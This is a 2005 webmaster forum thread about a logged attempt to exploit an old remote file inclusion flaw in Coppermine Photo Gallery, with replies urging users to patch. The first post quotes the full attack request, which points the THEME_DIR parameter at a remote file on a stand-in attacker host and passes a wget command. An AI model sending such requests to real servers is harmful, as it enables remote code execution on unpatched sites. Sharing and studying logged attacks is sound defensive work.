Coppermine Photo Gallery Multiple Vulnerabilities

Forum Moderators: DixonJones

Message Too Old, No Replies

Looks like someone is trying this old Vunnerability still

3:23 am on Jun 9, 2005 (gmt 0)

I got the following entry in my log creating a 404 error (I've changed the attackers web site to attacker.dom).

GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.dom/insert.jpg?&cmd=wget HTTP/1.1

I searched for it and found a Vunerability advisory dated 3 May 2004 about it. So it looks like someone is trying to use this old vunerability.

Both the IP address the request came from and the web site it is trying include files from are in Romania.

5:25 am on Jun 10, 2005 (gmt 0)

if you have it patched or aren't using the prouct then I wouldn't worry about it.

9:28 am on Jun 11, 2005 (gmt 0)

I'm not worried, as I'm not using it :-)

But just letting people know about it so they are aware of it so those that are using it can make sure they are patched.